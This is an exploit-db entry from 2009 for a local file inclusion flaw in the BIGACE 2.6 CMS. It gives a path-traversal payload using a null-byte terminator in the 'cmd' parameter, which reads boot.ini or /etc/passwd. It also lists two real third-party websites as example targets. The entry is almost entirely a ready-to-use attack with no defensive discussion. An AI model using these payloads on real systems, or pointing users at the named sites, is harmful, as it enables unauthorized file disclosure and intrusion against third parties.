exploit-db-mirror/exploits/php/webapps/9052.txt

-----------------:LFI:----------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------
script       : BIGACE 2.6

download  : http://garr.dl.sourceforge.net/sourceforge/bigace/bigace_2.6.zip

Author     : CWD@rBe

Special Thanks : www.cyber-warrior.org

***************************************************************************************************************
exploit:

http://127.0.0.1/public/index.php?cmd=../../../../../../../../boot.ini%00&id=-1_tsearch_len

example sites

1.http://my.slow.ccu.edu.tw/bigace/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len

2.http://www.tvoffenbach.net/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len

****************************************************************************************************************

# milw0rm.com [2009-06-30]